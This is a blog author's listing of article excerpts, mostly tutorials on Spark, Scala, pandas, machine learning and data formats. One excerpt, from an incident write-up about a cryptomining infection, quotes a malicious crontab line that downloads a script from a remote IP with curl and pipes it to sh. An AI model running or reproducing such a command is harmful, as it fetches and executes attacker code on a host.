2018年05月_DemonHunter211

原创 Spark算子：RDD基本转换操作(4)–union、intersection、subtract

uniondef union(other: RDD[T]): RDD[T]该函数比较简单，就是将两个RDD进行合并，不去重。 scala> var rdd1 = sc.makeRDD(1 to 2,1)rdd1: org.apache.spark.rdd.RDD[Int] = ParallelCollectionRDD[45] at makeRDD at :21 scala> rdd1...

2018-05-31 16:39:52 342

原创 Spark与Pandas中DataFrame对比（详细）

Spark与Pandas中DataFrame对比（详细）PandasSpark工作方式单机single machine tool，没有并行机制parallelism不支持Hadoop，处理大量数据有瓶颈分布式并行计算框架，内建并行机制parallelism，所有的数据和操作自动并行分布在各个集群结点上。以处理in-memory数据的方式处理distributed数据。支持Hadoop，能处理大量数...

2018-05-31 16:38:18 716

原创【Spark篇】---SparkSQL初始和创建DataFrame的几种方式

一、前述 1、SparkSQL介绍 Hive是Shark的前身，Shark是SparkSQL的前身,SparkSQL产生的根本原因是其完全脱离了Hive的限制。SparkSQL支持查询原生的RDD。 RDD是Spark平台的核心概念，是Spark能够高效的处理大数据的各种场景的基础。能够在Scala中写SQL语句。支持简单的SQL语法检查，能够在Scala中写Hive语...

2018-05-31 14:17:06 313

原创 Spark-SQL之DataFrame操作

　　dycopy :http://blog.csdn.net/dabokele/article/details/52802150　Spark SQL中的DataFrame类似于一张关系型数据表。在关系型数据库中对单表或进行的查询操作，在DataFrame中都可以通过调用其API接口来实现。可以参考，Scala提供的DataFrame API。　　本文中的代码基于Spark-1.6.2的文档实现。一...

2018-05-31 14:13:10 294

原创 Spark-mllib源码分析之逻辑回归(Logistic Regression)

一个例子类关系图创建用LBFGS求解LR的类运行模型模型优化1 损失与梯度的计算2 LR目标函数梯度计算3 LR正则项计算及梯度更新模型预测总结1. 一个例子// 0. LogisticRegressionWithLBFGSExample#main()def main(args: Array[String]): Unit = { val conf = new SparkConf().set...

2018-05-30 19:06:19 661

原创 scala学习笔记-Array、ArrayBuffer以及遍历数组（7）

Array在Scala中，Array代表的含义与Java中类似，也是长度不可改变的数组。此外，由于Scala与Java都是运行在JVM中，双方可以互相调用，因此Scala数组的底层实际上是Java数组。例如字符串数组在底层就是Java的String[]，整数数组在底层就是Java的Int[]。 1 // 数组初始化后，长度就固定下来了，而且元素全部根据其类型初始化 2 val a = new A...

2018-05-30 17:59:22 912

原创 Spark SQL 函数操作

Spark 内置函数使用Spark SQL中的内置函数对数据进行分析，Spark SQL API不同的是，DataFrame中的内置函数操作的结果是返回一个Column对象，而DataFrame天生就是”A distributed collection of data organized into named columns.”,这就为数据的复杂分析建立了坚实的基础并提供了极大的方便性，例如说，我...

2018-05-30 16:30:31 764

原创 [Spark sql]--所有函数举例(spark-2.x版本)

!! expr - Logical not.%expr1 % expr2 - Returns the remainder after expr1/expr2.Examples:> SELECT 2 % 1.8; 0.2> SELECT MOD(2, 1.8); 0.2&expr1 & expr2 - Returns the result of bitwise A...

2018-05-30 11:46:18 1309

原创 Spark2 Dataset之collect_set与collect_list

collect_set去除重复元素；collect_list不去除重复元素select gender, concat_ws(',', collect_set(children)), concat_ws(',', collect_list(children)) from Affairs group by gender 12345678910111213// 创建视图data...

2018-05-30 10:22:49 3071

原创 spark concat_ws,collect_set

concat_wshive > select product_id, concat_ws('_',collect_set(promotion_id)) as promotion_ids from product_promotion group by product_id;OK5112 960024_960025_960026_960027_9600285113 960043_96004...

2018-05-30 10:07:05 451

原创区块链太火，小心你的服务器被动挖矿

某日，笔者收到 VPS 服务器 CPU 告警，上服务器一看，有个叫做 gpg-agentd 的进程占用大量的 CPU 资源。接着就是常规的排查，IO 情况、网络流量、内存情况、系统日志、crontab 等。当排查到 crontab 时，发现 crontab 有如下的任务：*/5 * * * * curl -fsSL http://84.73.251.157:81/bar.sh | sh*/5 *...

2018-05-30 09:50:52 3228

原创 SPARK2.2 DATAFRAME的一些算子操作

Spark Session中的DataFrame类似于一张关系型数据表。在关系型数据库中对单表或进行的查询操作，在DataFrame中都可以通过调用其API接口来实现。可以参考，Scala提供的DataFrame API。本文中的代码基于Spark-2.2的文档实现。一、DataFrame对象的生成　　Spark-SQL可以以其他RDD对象、parquet文件、json文件、Hive表，以及通过J...

2018-05-25 16:19:32 3755

原创 spark2.x- spark sql语句可使用的内置函数

spark sql语句可使用的内置函数 // Note: Whenever we add a new entry here, make sure we also update ExpressionToSQLSuite val expressions: Map[String, (ExpressionInfo, FunctionBuilder)] = Map( // misc non-a...

2018-05-25 15:50:32 1062

原创 Window环境下使用IntelliJ IDEA调试Spark Application

最近在玩spark，每次敲完代码，就需要打成jar包上传服务器进行测试，所以比较繁琐，准备在window环境下使用IntelliJ IDEA搭建Spark调试环境。在window环境下先安装Spark环境：安装jdk，建议1.8+，配置java环境变量。下载Hadoop，并安装，配置环境变量，修改配置文件。下载Spark，并解压缩至本地，我的版本是spark-2.0.1-bin-hadoop2.7...

2018-05-25 12:38:30 962 3

原创 scala的split()函数

今天在写一个统计用户信息的程序时出现了bug，导致统计结果与真实值有很大差距。经过仔细检查，我发现是错误地使用split函数导致的。看来还是对scala中的split函数的理解不够透彻。本篇博文将详细解释scala中String.split的参数及用法。因为scala中的String复用了Java的String，因此这也是Java中String.split的用法。split函数主要有两种参数形...

2018-05-25 11:16:00 4658

原创 array,list,dataframe索引切片操作

list，一维，二维array,datafrme,loc、iloc、ix的简单探讨Numpy数组的索引和切片介绍：从最基础的list索引开始讲起，我们先上一段代码和结果：a = [0,1,2,3,4,5,6,7,8,9] a[:5:-1] #step < 0，所以start = 9 a[0:5:-1] #指定了start = 0 a[1::-1] #step < ...

2018-05-24 15:05:33 678

原创 numpy.degrees

numpy.degrees(x[, out]) = <ufunc 'degrees'>Convert angles from radians to degrees.Parameters:x : array_likeInput array in radians.out : ndarray, optionalOutput array of same shape as x.Returns:y...

2018-05-24 11:12:07 1309

原创 df.apply

http://www.cnblogs.com/wuzhiblog/p/python_new_row_or_col.html DataFrame数据预览： A B C D E0 0.673092 0.230338 -0.171681 0.312303 -0.1848131 -0.504482 -0.34428...

2018-05-24 11:06:00 1316 1

原创 Python3pandas库Series用法(基础整理)

构造/初始化Series的3种方法：（1）用列表list构建Series（1.2）pandas会默认用0到n来做Series的index,但是我们也可以自己指定index,index你可以理解为dict里面的key（2）用字典dict来构建Series，因为Series本身其实就是key-value的结构（3）用numpy array来构建Series选择数据（1）可以像对待一个list一样对待一...

2018-05-23 16:29:01 1334

原创 python中pandas库中DataFrame对行和列的操作使用方法

用pandas中的DataFrame时选取行或列：import numpy as npimport pandas as pdfrom pandas import Sereis, DataFrameser = Series(np.arange(3.))data = DataFrame(np.arange(16).reshape(4,4),index=list('abcd'),column...

2018-05-23 16:11:22 528

原创 Python之DataFrame常用方法小结

【Series】性质：一维数组对象，类似NumPy 的一维array。除了包含一组数据还包含一组索引，所以可以把它理解为一组带索引的数组。obj = Series([1,2,3,4],index = [‘a’,’b’,’c’,’d’]) #通过 index 参数显示指定索引obj.index obj.values #单独获取 Series 对象的索引或者数组内容obj*2 ob...

2018-05-23 16:09:11 1450

原创 Keras保存模型、checkpoint

1.Keras保存训练好的模型1) 使用model.save(filepath)将Keras模型和权重保存在一个HDF5文件中，该文件将包含：模型的结构，以便重构该模型模型的权重训练配置（损失函数，优化器等）优化器的状态，以便于从上次训练中断的地方开始使用keras.models.load_model(filepath)来重新实例化你的模型，如果文件中存储了训练配置的话，该函数还会同时完成模型的编...

2018-05-21 17:49:42 4142 5

原创将kyphosis的数据转换为libsvm数据格式的R语言实现

svm.str<-paste(as.integer(kyphosis$Kyphosis)," 1:",kyphosis$Age," 2:",kyphosis$Number," 3:",kyphosis$Start,sep="")write.table(svm.str,"c:/tmp/kyphosis_svm.txt",quote=FALSE,eol="\n",row.name

2018-05-21 16:47:15 366

原创生成libSVM的数据格式及使用方法总结

首先介绍一下 libSVM的数据格式Label 1:value 2:value ….Label：是类别的标识，比如上节train.model中提到的1 -1，你可以自己随意定，比如-10，0，15。当然，如果是回归，这是目标值，就要实事求是了。Value：就是要训练的数据，从分类的角度来说就是特征值，数据之间用空格隔开比如: -15 1:0.708 2:1056 3:-0.3333需要注意的是，如...

2018-05-21 15:40:44 7324 1

原创 PageRank-Spark

PageRank measures the importance of each vertex in a graph, assuming an edge from u to v represents an endorsement of v’s importance by u. For example, if a Twitter user is followed by many others, th...

2018-05-21 14:39:21 284

原创 PageRank算法--从原理到实现

本文将介绍PageRank算法的相关内容，具体如下：1.算法来源2.算法原理3.算法证明4.PR值计算方法4.1 幂迭代法4.2 特征值法4.3 代数法5.算法实现5.1 基于迭代法的简单实现5.2 MapReduce实现6.PageRank算法的缺点7.写在最后参考资料1. 算法来源这个要从搜索引擎的发展讲起。最早的搜索引擎采用的是分类目录[^ref_1] 的方法，即通过人工进行网页分类并整理...

2018-05-21 14:37:41 331

原创字符串解压缩类库(zip、GZIP、QuickLz、snappy、lzf、jzlib)介绍

1、ZIP、 GZIP 计算机文件压缩算法，JDK中java.util.zip.*中实现。主要包括ZipInputStream/ ZipOutputStream、GZipInputStream/ ZipOutputStream。2、QuickLZ是一个号称世界压缩速度最快的压缩库，并且也是个开源的压缩库，其遵守 GPL 1, 2 或 3协议。3、Snappy是一个 C++的用来压缩和解压缩的开发...

2018-05-18 15:52:29 30973 13

原创 (转)Google AI 学习笔记（三）——降低损失的方法

迭代方法迭代学习可能会让您想到“Hot and Cold”这种寻找隐藏物品（如顶针）的儿童游戏。在我们的游戏中，“隐藏的物品”就是最佳模型。刚开始，您会胡乱猜测（“w1 的值为 0"），等待系统告诉您损失是多少。然后，您再尝试另一种猜测（“w1 的值为 0.5"），看看损失是多少。哎呀，这次更接近目标了。实际上，如果您以正确方式玩这个游戏，通常会越来越接近目标。这个游戏真正棘手的地方在于尽...

2018-05-18 15:23:48 260

原创机器学习--线性回归(二)先验与正则化

上一篇我们提到了线性回归，线性回归是麻雀虽小，五脏俱全。定义模型、策略、方法，往后学习的机器学习算法基本上都是这样的套路。这一篇里，我们来讨论一下线性回归里的正则化。正则化很多接触过机器学习的同学的人都听过正则化是为了防止过拟合，很简单啊，不就是：重写了损失函数，加入的后半部分是正则化项，整个损失函数的目的直观上理解是既要让模型拟合训练样本，又要防止模型过于复杂出现正则化。正则化讲到这里就可以...

2018-05-18 13:42:58 315

原创【ML】大数据和机器学习有什么区别

大数据的定义大数据(big data)，指无法在一定时间范围内用常规软件工具进行捕捉、管理和处理的数据集合，是需要新处理模式才能具有更强的决策力、洞察发现力和流程优化能力的海量、高增长率和多样化的信息资产。大数据是一个笼统的概念暂未发现和准确的定义。大数据的核心是利用数据的价值，机器学习是利用数据价值的关键技术，对于大数据而言，机器学习是不可或缺的。相反，对于机器学习而言，越多的数据会越可能提...

2018-05-18 13:42:05 816

原创 (转)Google AI 学习笔记（三）——降低损失的方法

迭代方法迭代学习可能会让您想到“Hot and Cold”这种寻找隐藏物品（如顶针）的儿童游戏。在我们的游戏中，“隐藏的物品”就是最佳模型。刚开始，您会胡乱猜测（“w1 的值为 0"），等待系统告诉您损失是多少。然后，您再尝试另一种猜测（“w1 的值为 0.5"），看看损失是多少。哎呀，这次更接近目标了。实际上，如果您以正确方式玩这个游戏，通常会越来越接近目标。这个游戏真正棘手的地方在于尽...

2018-05-18 10:46:19 171

原创 pandas使用速查表

数据类型数据类型意义Series一维数组, 类型相同DataFrame二维表格数据类型, 理解为Series的容器Panel三维数组, 理解为 DataFrame 的容器创建对象方法意义pd.Series([1,3,4,np.nan,6,8])用列表创建 Seriespd.date_range(‘20130101’, periods=6)创建 DatetimeIndex 对象pd.DataFram...

2018-05-18 10:45:41 423

原创 JAVA压缩和解压字符串，BYTE数组，STRING

/*** * 压缩GZip * * @param data * @return */ public static byte[] gZip(byte[] data) { byte[] b = null; try { ByteArrayOutputStream bos = new ByteArrayOutputStream(); GZIPOutputStream gzip = ...

2018-05-18 10:08:41 1574

原创 [深度学习] 网络正则化

网络正则化机器学习的核心问题是如何使学习算法不仅在训练样本上表现良好，而且在新数据上或测试集上同时奏效，学习算法在新数据上的这样一种表现我们称之为模型的泛化能力。如果一个学习算法在训练集表现优异，同时在测试集依然工作良好，可以说该学习算法有较强的泛化能力。若某算法在训练集表现优异，但是测试集却非常糟糕，我们说这样的学习并没有泛化能力，这种现象也叫做过拟合（overfitting）。如何避免过拟合...

2018-05-17 11:43:59 483

原创广义线性模型（GLM）

在线性回归中，y丨x；θ~N（μ，σ^2)。在逻辑回归中，y丨x；θ~Bernoulli（Φ）。这两个都是GLM中的特殊的cases。我们首先引入一个指数族（the exponential family）的概念。如果一个分布能写成下列形式，那么我们说这个分布属于指数族。η是分布的自然参数（natural parameter ），比如伯努利分布中的Φ；T(y)是充分统计量（sufficient st...

2018-05-17 11:19:21 2128

原创广义线性模型（GLM）

在线性回归中，y丨x；θ~N（μ，σ^2)。在逻辑回归中，y丨x；θ~Bernoulli（Φ）。这两个都是GLM中的特殊的cases。我们首先引入一个指数族（the exponential family）的概念。如果一个分布能写成下列形式，那么我们说这个分布属于指数族。η是分布的自然参数（natural parameter ），比如伯努利分布中的Φ；T(y)是充分统计量（sufficient st...

2018-05-17 10:55:25 447

原创 [深度学习] 网络正则化

网络正则化机器学习的核心问题是如何使学习算法不仅在训练样本上表现良好，而且在新数据上或测试集上同时奏效，学习算法在新数据上的这样一种表现我们称之为模型的泛化能力。如果一个学习算法在训练集表现优异，同时在测试集依然工作良好，可以说该学习算法有较强的泛化能力。若某算法在训练集表现优异，但是测试集却非常糟糕，我们说这样的学习并没有泛化能力，这种现象也叫做过拟合（overfitting）。如何避免过拟合...

2018-05-17 10:54:25 580 1

原创 python之pandas简单介绍及使用（一）

一、　　Pandas简介1、Python Data Analysis Library 或 pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。Pandas 纳入了大量库和一些标准的数据模型，提供了高效地操作大型数据集所需的工具。pandas提供了大量能使我们快速便捷地处理数据的函数和方法。你很快就会发现，它是使Python成为强大而高效的数据分析环境的重要因素之一。2...

2018-05-17 10:51:23 609

原创双向循环神经网络+条件随机场进行分词

前言目前 NLP 领域的很多任务基本都会朝深度学习、注意力模型、半监督等方向发展，而且确实也取得了更好的效果，而有些也会把深度学习和传统机器学习结合起来，都能有不错的性能提升。这里讲一个用深度学习和机器学习结合来做分词。关于分词分词就是将一句话按照最合理的单词分开，英语一般就没有这个麻烦，因为英语词语都是空格隔开的，而中文就需要做额外处理。分词任务一般是nlp其他任务的基础，分词分得好不好将直接对...

2018-05-17 10:47:13 838

原创混沌神经网络学习笔记四

首次提出混沌神经网络的概念：Adachi神经网络Adachi神经网络结构图：假设外部激励函数为常数a，神经元的内部状态变量为y(t),神经元在时刻t的输出为x(t)，不应性反馈常数为（通常为正值），不应性衰减因子为k。则可表示为：单个神经元的模型为下图： ...

2018-05-17 10:46:38 663

Flink1.11中文文档

空空如也